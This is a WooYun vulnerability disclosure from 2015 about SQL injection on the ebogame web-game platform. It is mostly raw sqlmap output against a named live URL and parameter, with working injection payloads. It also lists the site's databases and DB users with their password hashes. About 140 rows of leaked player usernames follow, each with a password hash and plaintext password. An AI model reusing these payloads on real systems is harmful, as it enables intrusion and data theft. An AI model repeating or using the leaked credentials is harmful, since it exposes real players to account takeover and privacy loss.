当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154211

漏洞标题:ebogame页游平台SQL注入漏洞(ROOT权限)导致233W万玩家信息泄露(用户名/密码/支付密码等)

相关厂商:ebogame页游平台

漏洞作者: 路人甲

提交时间:2015-11-20 18:42

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

ebogame页游平台SQL注入漏洞(ROOT权限)导致233W万玩家信息泄露(用户名/密码/支付密码等)
Database: ebogame
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| ebogame_member_login | 4025115 |
| ebogame_member | 2338936 |

详细说明:

第一波游戏平台sql注入漏洞 直接是root 权限,泄露了233万用户敏感信息。。。。。
可以直接登录用户的游戏账号。。。。
URL: http://rxms.ebogame.com/news.php?contentid=2654

sqlmap identified the following injection points with a total of 0 HTTP(s) 
reque
sts:
---
Place: GET
Parameter: contentid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: contentid=2654 AND 9396=9396
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: contentid=2654 AND (SELECT 9509 FROM(SELECT COUNT(*),CONCAT
(0x3a787
3663a,(SELECT (CASE WHEN (9509=9509) THEN 1 ELSE 0 
END)),0x3a7366653a,FLOOR(RAND
(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (random number) - 22 columns
    Payload: contentid=-5092 UNION ALL SELECT 
3595,3595,3595,3595,3595,CONCAT(0x
3a7873663a,0x6467566c65764f674250,0x3a7366653a),3595,3595,3595,3595,3595,3
595,35
95,3595,3595,3595,3595,3595,3595,3595,3595,3595#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: contentid=2654 AND SLEEP(5)
---
[21:04:53] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0
available databases [13]:
[*] 5ebo
[*] 5ebo_bbs
[*] 5ebo_oa
[*] 5ebo_ucenter
[*] 5ebo_www
[*] 5ebo_www_test
[*] eboedu
[*] ebogame
[*] ebogame_1
[*] information_schema
[*] my
[*] mysql
[*] test
database management system users [11]:
[*] ''@'localhost'
[*] ''@'tis-web-web01.pm'
[*] '5ebo_oa'@'192.168.0.10'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'tis-web-web01.pm'
[*] 'work_5ebo'@'192.168.%'
[*] 'work_5ebo'@'localhost'
[*] 'work_5ebo_dl'@'192.168.%'
[*] 'work_ebogame'@'192.168.%'
[*] 'work_ebogame'@'localhost'
current user:    'work_ebogame@192.168.%'
current database:    'ebogame'
database management system users password hashes:
[*] 5ebo_oa [1]:
    password hash: *D8B7841A7835C0403A300FF1C8CFA8A94D614D37
[*] root [2]:
    password hash: *D8B7841A7835C0403A300FF1C8CFA8A94D614D37
    password hash: NULL
[*] work_5ebo [1]:
    password hash: *00B88F15A176AFDD80DF283B1915892C16AB5B15
[*] work_5ebo_dl [1]:
    password hash: *851AB15606CDF00798F71432C4CD362AA932B9BD
[*] work_ebogame [1]:
    password hash: *1B9FE80A16BE885EAB9CECB092928265D1B2F98D


2.png


3.png


4.png


5.png


漏洞证明:

Database: ebogame
[337 tables]
+-----------------------------------+
| api_send_mail                     |
| bbs_actlogs                       |
| bbs_apclog                        |
| bbs_beg                           |
| bbs_bmbcode                       |
| bbs_contacts                      |
| bbs_emoticons                     |
| bbs_favorites                     |
| bbs_forumdata                     |
| bbs_gueststat                     |
| bbs_invite                        |
| bbs_lastest                       |
| bbs_levels                        |
| bbs_onlinestat                    |
| bbs_polls                         |
| bbs_posts                         |
| bbs_potlog                        |
| bbs_primsg                        |
| bbs_schedule                      |
| bbs_search                        |
| bbs_shareforum                    |
| bbs_tags                          |
| bbs_threads                       |
| bbs_ugoptlist                     |
| bbs_usergroup                     |
| bbs_userlist                      |
| ebogame_activation                |
| ebogame_advertising               |
| ebogame_advertising_click         |
| ebogame_bbs                       |
| ebogame_bbs_section               |
| ebogame_category                  |
| ebogame_charge                    |
| ebogame_charge_bf                 |
| ebogame_charge_copy               |
| ebogame_charge_heepay             |
| ebogame_content                   |
| ebogame_extension                 |
| ebogame_extension_member          |
| ebogame_extension_percent         |
| ebogame_extension_settlemen       |
| ebogame_extension_settlemen_once  |
| ebogame_game_areas                |
| ebogame_game_code                 |
| ebogame_game_gift_code            |
| ebogame_game_gift_code_           |
| ebogame_game_gift_code_17173      |
| ebogame_game_gift_info_           |
| ebogame_game_gift_info_17173      |
| ebogame_games                     |
| ebogame_integral                  |
| ebogame_member                    |
| ebogame_member_char               |
| ebogame_member_info               |
| ebogame_member_integral           |
| ebogame_member_login              |
| ebogame_member_price              |
| ebogame_member_serv               |
| ebogame_news                      |
| ebogame_pictures                  |
| ebogame_price                     |
| ebogame_question_reply            |
| ebogame_questions                 |
| pre_common_admincp_cmenu          |
| pre_common_admincp_group          |
| pre_common_admincp_member         |
| pre_common_admincp_perm           |
| pre_common_admincp_session        |
| pre_common_admingroup             |
| pre_common_adminnote              |
| pre_common_advertisement          |
| pre_common_advertisement_custom   |
| pre_common_banned                 |
| pre_common_block                  |
| pre_common_block_favorite         |
| pre_common_block_item             |
| pre_common_block_item_data        |
| pre_common_block_permission       |
| pre_common_block_pic              |
| pre_common_block_style            |
| pre_common_block_xml              |
| pre_common_cache                  |
| pre_common_card                   |
| pre_common_card_log               |
| pre_common_card_type              |
| pre_common_connect_guest          |
| pre_common_credit_log             |
| pre_common_credit_rule            |
| pre_common_credit_rule_log        |
| pre_common_credit_rule_log_field  |
| pre_common_cron                   |
| pre_common_devicetoken            |
| pre_common_district               |
| pre_common_diy_data               |
| pre_common_domain                 |
| pre_common_failedlogin            |
| pre_common_friendlink             |
| pre_common_grouppm                |
| pre_common_invite                 |
| pre_common_magic                  |
| pre_common_magiclog               |
| pre_common_mailcron               |
| pre_common_mailqueue              |
| pre_common_member                 |
| pre_common_member_action_log      |
| pre_common_member_connect         |
| pre_common_member_count           |
| pre_common_member_crime           |
| pre_common_member_field_forum     |
| pre_common_member_field_home      |
| pre_common_member_grouppm         |
| pre_common_member_log             |
| pre_common_member_magic           |
| pre_common_member_medal           |
| pre_common_member_profile         |
| pre_common_member_profile_setting |
| pre_common_member_security        |
| pre_common_member_stat_field      |
| pre_common_member_status          |
| pre_common_member_validate        |
| pre_common_member_verify          |
| pre_common_member_verify_info     |
| pre_common_myapp                  |
| pre_common_myinvite               |
| pre_common_mytask                 |
| pre_common_nav                    |
| pre_common_onlinetime             |
| pre_common_patch                  |
| pre_common_plugin                 |
| pre_common_pluginvar              |
| pre_common_process                |
| pre_common_regip                  |
| pre_common_relatedlink            |
| pre_common_report                 |
| pre_common_searchindex            |
| pre_common_secquestion            |
| pre_common_session                |
| pre_common_setting                |
| pre_common_smiley                 |
| pre_common_sphinxcounter          |
| pre_common_stat                   |
| pre_common_statuser               |
| pre_common_style                  |
| pre_common_stylevar               |
| pre_common_syscache               |
| pre_common_tag                    |
| pre_common_tagitem                |
| pre_common_task                   |
| pre_common_taskvar                |
| pre_common_template               |
| pre_common_template_block         |
| pre_common_template_permission    |
| pre_common_uin_black              |
| pre_common_usergroup              |
| pre_common_usergroup_field        |
| pre_common_word                   |
| pre_common_word_type              |
| pre_connect_disktask              |
| pre_connect_feedlog               |
| pre_connect_memberbindlog         |
| pre_connect_postfeedlog           |
| pre_connect_tthreadlog            |
| pre_forum_access                  |
| pre_forum_activity                |
| pre_forum_activityapply           |
| pre_forum_announcement            |
| pre_forum_attachment              |
| pre_forum_attachment_0            |
| pre_forum_attachment_1            |
| pre_forum_attachment_2            |
| pre_forum_attachment_3            |
| pre_forum_attachment_4            |
| pre_forum_attachment_5            |
| pre_forum_attachment_6            |
| pre_forum_attachment_7            |
| pre_forum_attachment_8            |
| pre_forum_attachment_9            |
| pre_forum_attachment_exif         |
| pre_forum_attachment_unused       |
| pre_forum_attachtype              |
| pre_forum_bbcode                  |
| pre_forum_collection              |
| pre_forum_collectioncomment       |
| pre_forum_collectionfollow        |
| pre_forum_collectioninvite        |
| pre_forum_collectionrelated       |
| pre_forum_collectionteamworker    |
| pre_forum_collectionthread        |
| pre_forum_creditslog              |
| pre_forum_debate                  |
| pre_forum_debatepost              |
| pre_forum_faq                     |
| pre_forum_forum                   |
| pre_forum_forum_threadtable       |
| pre_forum_forumfield              |
| pre_forum_forumrecommend          |
| pre_forum_groupcreditslog         |
| pre_forum_groupfield              |
| pre_forum_groupinvite             |
| pre_forum_grouplevel              |
| pre_forum_groupuser               |
| pre_forum_imagetype               |
| pre_forum_medal                   |
| pre_forum_medallog                |
| pre_forum_memberrecommend         |
| pre_forum_moderator               |
| pre_forum_modwork                 |
| pre_forum_onlinelist              |
| pre_forum_order                   |
| pre_forum_poll                    |
| pre_forum_polloption              |
| pre_forum_pollvoter               |
| pre_forum_post                    |
| pre_forum_post_location           |
| pre_forum_post_moderate           |
| pre_forum_post_tableid            |
| pre_forum_postcache               |
| pre_forum_postcomment             |
| pre_forum_postlog                 |
| pre_forum_poststick               |
| pre_forum_promotion               |
| pre_forum_ratelog                 |
| pre_forum_relatedthread           |
| pre_forum_replycredit             |
| pre_forum_rsscache                |
| pre_forum_spacecache              |
| pre_forum_statlog                 |
| pre_forum_thread                  |
| pre_forum_thread_moderate         |
| pre_forum_threadaddviews          |
| pre_forum_threadclass             |
| pre_forum_threadclosed            |
| pre_forum_threaddisablepos        |
| pre_forum_threadimage             |
| pre_forum_threadlog               |
| pre_forum_threadmod               |
| pre_forum_threadpartake           |
| pre_forum_threadpreview           |
| pre_forum_threadrush              |
| pre_forum_threadtype              |
| pre_forum_trade                   |
| pre_forum_tradecomment            |
| pre_forum_tradelog                |
| pre_forum_typeoption              |
| pre_forum_typeoptionvar           |
| pre_forum_typevar                 |
| pre_forum_warning                 |
| pre_home_album                    |
| pre_home_album_category           |
| pre_home_appcreditlog             |
| pre_home_blacklist                |
| pre_home_blog                     |
| pre_home_blog_category            |
| pre_home_blog_moderate            |
| pre_home_blogfield                |
| pre_home_class                    |
| pre_home_click                    |
| pre_home_clickuser                |
| pre_home_comment                  |
| pre_home_comment_moderate         |
| pre_home_docomment                |
| pre_home_doing                    |
| pre_home_doing_moderate           |
| pre_home_favorite                 |
| pre_home_feed                     |
| pre_home_feed_app                 |
| pre_home_follow                   |
| pre_home_follow_feed              |
| pre_home_follow_feed_archiver     |
| pre_home_friend                   |
| pre_home_friend_request           |
| pre_home_friendlog                |
| pre_home_notification             |
| pre_home_pic                      |
| pre_home_pic_moderate             |
| pre_home_picfield                 |
| pre_home_poke                     |
| pre_home_pokearchive              |
| pre_home_share                    |
| pre_home_share_moderate           |
| pre_home_show                     |
| pre_home_specialuser              |
| pre_home_userapp                  |
| pre_home_userappfield             |
| pre_home_visitor                  |
| pre_mobile_setting                |
| pre_portal_article_content        |
| pre_portal_article_count          |
| pre_portal_article_moderate       |
| pre_portal_article_related        |
| pre_portal_article_title          |
| pre_portal_article_trash          |
| pre_portal_attachment             |
| pre_portal_category               |
| pre_portal_category_permission    |
| pre_portal_comment                |
| pre_portal_comment_moderate       |
| pre_portal_rsscache               |
| pre_portal_topic                  |
| pre_portal_topic_pic              |
| pre_security_evilpost             |
| pre_security_eviluser             |
| pre_security_failedlog            |
| pre_ucenter_admins                |
| pre_ucenter_applications          |
| pre_ucenter_badwords              |
| pre_ucenter_domains               |
| pre_ucenter_failedlogins          |
| pre_ucenter_feeds                 |
| pre_ucenter_friends               |
| pre_ucenter_mailqueue             |
| pre_ucenter_memberfields          |
| pre_ucenter_members               |
| pre_ucenter_mergemembers          |
| pre_ucenter_newpm                 |
| pre_ucenter_notelist              |
| pre_ucenter_pm_indexes            |
| pre_ucenter_pm_lists              |
| pre_ucenter_pm_members            |
| pre_ucenter_pm_messages_0         |
| pre_ucenter_pm_messages_1         |
| pre_ucenter_pm_messages_2         |
| pre_ucenter_pm_messages_3         |
| pre_ucenter_pm_messages_4         |
| pre_ucenter_pm_messages_5         |
| pre_ucenter_pm_messages_6         |
| pre_ucenter_pm_messages_7         |
| pre_ucenter_pm_messages_8         |
| pre_ucenter_pm_messages_9         |
| pre_ucenter_protectedmembers      |
| pre_ucenter_settings              |
| pre_ucenter_sqlcache              |
| pre_ucenter_tags                  |
| pre_ucenter_vars                  |
| sglj_charge                       |
| sglj_coin                         |
| sglj_extension                    |
+-----------------------------------+
Database: ebogame
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| ebogame_member_login              | 4025115 |
| ebogame_member                    | 2338936 |
| ebogame_activation                | 826832  |
| ebogame_member_integral           | 678562  |
| pre_ucenter_members               | 387888  |
| bbs_userlist                      | 329198  |
| ebogame_member_info               | 280663  |
| ebogame_member_serv               | 280653  |
| ebogame_member_char               | 239791  |
| ebogame_charge                    | 239228  |
| api_send_mail                     | 61235   |
| ebogame_advertising_click         | 51880   |
| pre_common_district               | 45051   |
| ebogame_charge_copy               | 43282   |
| pre_forum_post                    | 27728   |
| ebogame_game_gift_code_17173      | 20000   |
| pre_home_notification             | 14234   |
| pre_common_credit_rule_log        | 13012   |
| pre_forum_thread                  | 12229   |
| pre_forum_threadpartake           | 10744   |
| pre_forum_threadmod               | 9011    |
| pre_common_member_count           | 8180    |
| pre_common_member_field_forum     | 8180    |
| pre_common_member_field_home      | 8180    |
| pre_common_member_profile         | 8180    |
| pre_common_member_status          | 8180    |
| pre_common_member                 | 8172    |
| pre_common_onlinetime             | 6443    |
| ebogame_game_code                 | 6210    |
| bbs_posts                         | 5157    |
| ebogame_game_gift_code            | 5000    |
| pre_ucenter_memberfields          | 4809    |
| pre_forum_statlog                 | 4446    |
| ebogame_member_price              | 3442    |
| ebogame_game_gift_code_           | 3000    |
| ebogame_content                   | 2638    |
| ebogame_extension_member          | 2567    |
| ebogame_news                      | 2288    |
| bbs_apclog                        | 2061    |
| ebogame_question_reply            | 1668    |
Database: ebogame
Table: ebogame_member
[24 columns]
+----------------+-----------+
| Column         | Type      |
+----------------+-----------+
| 56xiu_id       | char(50)  |
| codestate      | int(1)    |
| display        | int(1)    |
| error_count    | int(1)    |
| error_time     | int(11)   |
| id             | int(11)   |
| integral       | int(11)   |
| integral_get   | int(11)   |
| integral_use   | int(11)   |
| name           | char(20)  |
| newip          | char(20)  |
| newtime        | int(11)   |
| oldip          | char(20)  |
| oldtime        | int(11)   |
| password       | char(40)  |
| password_nomd5 | char(20)  |
| password_old   | char(20)  |
| pay_pass       | char(40)  |
| pay_pass_nomd5 | char(20)  |
| regtime        | int(11)   |
| role           | char(2)   |
| times          | int(11)   |
| urlsource      | char(100) |
| yiqidd_id      | int(11)   |
+----------------+-----------+
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0
Database: ebogame
Table: ebogame_member
[204 entries]
+----------------------+------------+-------------------------------------------------+-----------------+-----------------+
| name                 | regtime    | password                                        | password_old    | password_nomd5  |
+----------------------+------------+-------------------------------------------------+-----------------+-----------------+
| y0y85FQQcLDRsWyOO    | 1365757679 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| kyozhj11             | 1393494627 | cf77775714fadcaf0e74bc638fd8d45c                | 22897479        | 22897479        |
| zNeFhAHdDtKiFGq      | 1372244960 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| snowlee331           | 1333612593 | af29708cb75a2a1b270d54de93ac6c4f                | sf798205        | lx798205        |
| guanlaoshi           | 1333615910 | 5d93ceb70e2bf5daa84ec3d0cd2c731a                | qwer1234        | qwer1234        |
| hl12788835           | 1333418400 | 8c316bef04f6331504474d655132c993                | 666666          | 84252453        |
| OlF5AKqc             | 1366185054 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| K3H7nc8SeWx          | 1364983470 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| dodcnzwy             | 1333962813 | 7388adbe6477d595a7031912227d63ba                | zwyking         | zwyking         |
| 2FByPEpaE058POFO     | 1383051840 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| jdWpHGNze2           | 1387191190 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| chenbaizhen          | 1334547995 | e10adc3949ba59abbe56e057f20f883e (123456)       | 123456          | 123456          |
| cjwddly              | 1334573623 | 9c7cc2cde1939666d314378b18857721 (122333)       | cjwddly123      | 122333          |
| guanwei1100222       | 1334582009 | f379eaf3c831b04de153469d1bec345e (666666)       | 666666          | 666666          |
| 8XzJ0554DC           | 1383061966 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| gjh133               | 1334642897 | cf17a1ff2598f3ecc2c8f0f251eb2ccd                | 133566          | 133566          |
| a12788835            | 1334646159 | d4ff022d36ed3455c94117f52d26c838                | wang0509.       | 19900719        |
| xhlacc               | 1334720986 | 9f935666d3fa2e9dd14dfc9e10e388f0                | xuheliang       | xuheliang       |
| 102666690            | 1334731931 | e10adc3949ba59abbe56e057f20f883e (123456)       | 123456          | 123456          |
| 524938642            | 1334731986 | 5281e5990e4b880e76d5f60acf13e7af (880829)       | 880829          | 880829          |
| aaa111               | 1334741763 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| linfuyong            | 1334742135 | d1bfb1239e360c0986a272d13bbdd558                | 4722587         | 4722587         |
| 596301397            | 1334755260 | f36d351003a44085d595d823eb698001                | 19781212        | xyza56858       |
| lulu445978197        | 1334762694 | fdbc7edb518707e9028c772ca8ead647                | lulu13717666187 | lulu13717666187 |
| yrr133               | 1334763739 | 7d98a6b10262159d4d7b893712a96090                | 133566          | 1335661         |
| Sophia               | 1334827084 | e10adc3949ba59abbe56e057f20f883e (123456)       | 123456          | 123456          |
| terron1989           | 1334839331 | 750983d573942dbaf8e94d3b5d769f78                | 15963296285     | 15963296285     |
| ifbseUg20ENmk        | 1383314193 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| 276685417            | 1334913708 | 74e4b9026c948e8a2994aeb0d85eee01 (babyiloveyou) | 111111          | babyiloveyou    |
| q470314089           | 1334917250 | d7658645cf756604c2376af8e19f466f                | aaaaaa          | chao900401      |
| siki1526             | 1334920673 | ea0e20e63fdc3ec7c3c5e3eb3be5706e                | zxc1526         | zxc1526         |
| qwerty               | 1334977886 | 3fde6bb0541387e4ebdadf7c2ff31123 (1q2w3e)       | 1q2w3e          | 1q2w3e          |
| 3UlrjVbuwxp8EHWR     | 1377528923 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| 63516217             | 1335145267 | 8aad3dc761337853da227189f175b75e                | 63516217        | guanwen2        |
| xiangjunfeng         | 1335156754 | a75b42126c12d7932264d9901c21e769                | 810102          | 810102          |
| snowlee332           | 1335176803 | f379eaf3c831b04de153469d1bec345e (666666)       | 821124          | 666666          |
| liyang3931           | 1335182170 | 1b164efcffe6c3b77172578ebfae50c2                | 2718838         | 2718838         |
| 8NBz1iqx5VKdaSS      | 1376381360 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| 362083               | 1335250511 | 1fc850318aa2680a947e6e52ca325ae4                | 362083          | 362083          |
| 4McgF5OAeSsRmFhnCbW  | 1384265847 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| fumingming           | 1335322591 | fa9c5f4190bc9fef1f4c1e9a846f01c7                | 000000          | fumingming00    |
| a13232155833         | 1335328339 | 345c07567e336aae4b91c5df5794a8b8                | 13138738299     | 1983solidsnake  |
| sannana89            | 1335346945 | 3d497d4d4f4cc5f1785a35e86b701a94                | zgfjptbz1989    | zgfjptbz1989    |
| 327620955            | 1335347332 | cb693d591c50cdf6e78b9c90691a9c9c                | 8807701314      | 8807701314      |
| gG9quXINLqzw         | 1379407145 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| cy71ata              | 1335351017 | 758772aafe05c0b676146c810c8a334d                | cy176891        | cy176891        |
| ao1shib1234          | 1335360852 | 1bf9a71d2169b0ca7429ca3ce23e4916                | 19841108        | 19841108        |
| qq17400630           | 1335373722 | cc95ff8bc079810fea32527aaee5b9cc (131420)       | 131420          | 131420          |
| snow1987             | 1335374950 | 9ec3b03ec0ddc694125619c5e386b116                | 1987612         | 1987612         |
| a15659337729         | 1335375279 | cc95ff8bc079810fea32527aaee5b9cc (131420)       | 131420          | 131420          |
| jccg1000033732       | 1335404018 | 2b2fb1e0fcf23735767e6efd90392ec2                | 13701039758wjz  | 13701039758wjz  |
| dingwu5271           | 1357531186 | c353e8ec503be0cb12e1060ee34188e5                | 4410410         | 4410410         |
| sxjcycylxz           | 1335409418 | 9a0d36acf0b4669a6ec85e769e9c14b6                | 4841664         | 4841664         |
| doukun8736030        | 1335409676 | f69fac000fa7479f743e00149c909a0a                | 8736030         | 8736030         |
| s158908602           | 1335409982 | 359b9679f0b4b80d0bc7fa46e6118000                | 250788914       | 250788914       |
| wyq2012cs            | 1335410197 | 21f0c57d71e8ac40e07b693d8ac76315                | 1983solidsnake  | wyq20048908     |
| purefeng1815         | 1335412276 | 62972ae72f53b9b7c29e83630408ce26                | purefeng1816    | purefeng1816    |
| homura               | 1335415261 | b4b1193a3f9d0edbe592207688c67024 (198610)       | 198610          | 198610          |
| a8723606             | 1335421652 | e10adc3949ba59abbe56e057f20f883e (123456)       | 123456          | 123456          |
| Ovh1xey3E            | 1381292846 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| b2LETa0sjokoO76L3ajk | 1385961106 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| sos5588779           | 1335430501 | ee60db57aaff31f6792b3f66007f22ee                | 000000          | 920326          |
| yeyouss01            | 1335432247 | 46f94c8de14fb36680850768ff1b7f2a (123qwe)       | 123qwe          | 123qwe          |
| b12788835            | 1335435203 | e10adc3949ba59abbe56e057f20f883e (123456)       | 123456          | 123456          |
| henvey               | 1335438444 | 0cb14dc28de0d3e7c7b0a1563f9f829f                | 229628732       | 229628732       |
| PKtianxia12345       | 1335447173 | 8aad3dc761337853da227189f175b75e                | woaini123       | guanwen2        |
| 961648314            | 1335448916 | 8ddc5af3cf6f973cedf36f8504cc1983                | 15235978947c    | 15235978947c    |
| zyf001               | 1335450912 | 345c07567e336aae4b91c5df5794a8b8                | 1983solidsnake  | 1983solidsnake  |
| huanging1            | 1335452275 | f6d19652c8f635eb88a5c93c8ec52cd7                | lingling        | lingling        |
| liuchang3232         | 1335486815 | 9cc9b422eb40ba7a69122b0834cc5a62                | lc281314        | lc281314        |
| httanga              | 1335488054 | bdfa762517dbee605ddea6ac0205b3ec                | aa12345         | aa12345         |
| httangb              | 1335488382 | bdfa762517dbee605ddea6ac0205b3ec                | aa12345         | aa12345         |
| httangc              | 1335488499 | bdfa762517dbee605ddea6ac0205b3ec                | aa12345         | aa12345         |
| MBNbMIFe             | 1370343918 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| liuchang             | 1335491367 | 9cc9b422eb40ba7a69122b0834cc5a62                | lc281314        | lc281314        |
| 247402177            | 1335495039 | 4862fa800d5cad94969a92bca1a5696e                | 247402177       | sam987654       |
| 65895324             | 1335495442 | d79597ece33a156e0889f67095da4196                | 19811101        | 19811101        |
| lili22               | 1335497597 | 3354045a397621cd92406f1f98cde292 (1122334455)   | 123456789       | 1122334455      |
| tanxiao8444          | 1335499287 | 5396d010a230b71d8e315358643d2815                | 82930444        | 82930444        |
| lckwAj               | 1370350111 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| 18061068             | 1335502744 | e44a5fcc9b6f934f6bf9be0e3b5c47b3                | xiaohuhu        | 6632032         |
| qq20428663           | 1335508482 | f5bb0c8de146c67b44babbf4e6584cc0 (123123123)    | 123123123       | 123123123       |
| uhcoNpBP             | 1372249570 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| huxuan1207           | 1335513971 | d5268a1a38120c5724656b70973fdc09                | 19900718        | 1202rt0712      |
| v5kkpzpXV4TYO8OznB   | 1365585381 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| wh0210258            | 1335519273 | 886fb7b33c323a746a85e322bf221597 (12357895)     | 12357895        | 12357895        |
| eHWN9QUTOcW0heJVPBl8 | 1388488488 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| lixl88488            | 1335520154 | bb4c1fd434a7b4b330ab90a7bb4c6799 (251064)       | 251064          | 251064          |
| ktbeh9708            | 1335521226 | 74113b0590c46a74ec00f829b847c905                | albert9708      | albert9708      |
| zyk002               | 1335521572 | 4862fa800d5cad94969a92bca1a5696e                | 887111aa        | sam987654       |
| saminliny            | 1335521646 | 4862fa800d5cad94969a92bca1a5696e                | sam123654       | sam987654       |
| qq853947710          | 1335521656 | 71ae10b9927e9d752fb56ba7fc50b2ae                | 915102          | 915102          |
| yy2173               | 1335522804 | a5c859b2355b26945a8b33cf684bf902                | 326326          | 31301782        |
| wieyuy888            | 1335523132 | 6c52ba9fe8be135c3b758c37f84f1281                | yu740413        | yu740413        |
| kaming7              | 1335523274 | 1698505c6133c15205fa9c8493c9ec33                | 92775931        | 92775931        |
| lgwindy              | 1335523962 | bd372f2295840ed39881c0d98f51bd69                | 801214          | 801214          |
| qwe123               | 1335524700 | d0dcbf0d12a6b1e7fbfa2ce5848f3eff                | qq123456        | qq123456        |
| wawjguo              | 1335524759 | cffbad68bb97a6c3f943538f119c992c (asdzxc)       | asdzxc          | asdzxc          |
| kjw520ttxs           | 1335524768 | 2bebb4d38926dd0c3b43314324e1969d                | mlf2325081      | mlf2325081      |
| jj300295             | 1335524784 | f0c6dd5768f9bebee72e233e6470e6f9                | 137367          | 137367          |
| a556634              | 1335525844 | 0abd864f9be4e0e40d8986a0ac6efc26                | a5283015        | a5283015        |
| vanderbilt           | 1335526910 | 4519b6062cc7f48c9d3c16506a759d45                | 522702          | 522702          |
| 344497256            | 1335527420 | 877154cbf948f0bda006a202d64a1042                | li13580734508   | li13580734508   |
| siki0001             | 1335527551 | ea0e20e63fdc3ec7c3c5e3eb3be5706e                | zxc1526         | zxc1526         |
| a52474031            | 1335527552 | b5401e2aedc98c5becb68c1c2e4161e4                | 52474031        | 52474031        |
| zggsjygwwd           | 1335529073 | 8b1bcc93741e56ffbc6b4ae8fcf8e962                | wwd2336         | wwd2336         |
| httangd              | 1335529591 | bdfa762517dbee605ddea6ac0205b3ec                | aa12345         | aa12345         |
| t6bF46jgEVzZJ5q5wy   | 1378375365 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| httange              | 1335529766 | bdfa762517dbee605ddea6ac0205b3ec                | aa12345         | aa12345         |
| zggsjygjgwwd         | 1335529878 | 8b1bcc93741e56ffbc6b4ae8fcf8e962                | wwd2336         | wwd2336         |
| zggsjygylxqwwd       | 1335529966 | 8b1bcc93741e56ffbc6b4ae8fcf8e962                | wwd2336         | wwd2336         |
| zggsjyglhwwd         | 1335530043 | 8b1bcc93741e56ffbc6b4ae8fcf8e962                | wwd2336         | wwd2336         |
| hz6fLMyFRD2okE       | 1377074908 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| zplxf999001          | 1335532968 | e10adc3949ba59abbe56e057f20f883e (123456)       | 123456          | 123456          |
| P0z5Yje6Vwqp8jnw2I   | 1384149206 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| 013227               | 1335533199 | e5624cefa6a38db485b4d2527b06647e                | 013227          | 013227          |
| hf98848              | 1335533288 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| yjk870512            | 1335533342 | 8369330a9bda621154a3bf1bedb291a9                | yjkmc159        | yjkmc159        |
| homura1              | 1335534380 | b4b1193a3f9d0edbe592207688c67024 (198610)       | 198610          | 198610          |
| YdhwzZ0RZsXNg7tQPKH8 | 1387882447 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| asd123               | 1335535139 | e10adc3949ba59abbe56e057f20f883e (123456)       | 123456          | 123456          |
| siki0002             | 1335535183 | ea0e20e63fdc3ec7c3c5e3eb3be5706e                | zxc1526         | zxc1526         |
| qwe1122              | 1335535281 | ea0e20e63fdc3ec7c3c5e3eb3be5706e                | zxc1526         | zxc1526         |
| 013228               | 1335535432 | 00b72fe9c4403452a7182cb5d39a0854                | 013228          | 013228          |
| doudou               | 1335535549 | 5d93ceb70e2bf5daa84ec3d0cd2c731a                | qwer1234        | qwer1234        |
| 013229               | 1335535605 | 3a5f9d8d824e2b227b0e6e5a94121610                | 013229          | 013229          |
| lian781              | 1335535969 | ea0e20e63fdc3ec7c3c5e3eb3be5706e                | zxc1526         | zxc1526         |
| z556634              | 1335536617 | 0abd864f9be4e0e40d8986a0ac6efc26                | a5283015        | a5283015        |
| zhuxiaoranal         | 1335536956 | 88b6874a80d76304cdeca7f6f59e9157                | tytkzhedwx      | tytkzhedwx      |
| cm870512             | 1335537526 | 8369330a9bda621154a3bf1bedb291a9                | yjkmc159        | yjkmc159        |
